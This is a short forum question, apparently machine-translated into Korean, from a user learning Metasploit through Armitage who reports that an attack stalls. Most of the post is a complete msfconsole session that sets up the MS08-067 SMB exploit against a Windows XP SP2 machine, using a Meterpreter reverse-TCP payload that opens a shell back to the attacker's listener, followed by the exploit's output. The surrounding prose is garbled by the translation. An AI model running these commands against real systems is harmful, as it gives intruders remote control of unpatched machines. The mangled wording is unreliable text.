구조에 대한 일반적인 이해를 얻으려면 아미티지 (Armitage)에서 시작하는 메타 스 플리트 (Metasploit) 프레임 워크를 배우고 있습니다. 나는 공격을 실행하려고하면 나는이백 트랙 5 아미티지 MSF
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
내가 오류를 얻을하지 않습니다 얻을하지만이 포장 마차와 악용 수행하지 않는 내가 가진 오래된 Windowx XP의 SP2를 해킹하려고했다.
감사 남자, 나는 확실히 그 튜토리얼을 살펴 보겠습니다. 나는 이전에 칼리를 사용하려고 시도했으나 그것을 사용할 때 어떤 느낌이 들지 않는다. 그러나 나는 그것을 계속 시험해 볼 것을 강요하려고 노력할 것이다. – Sloth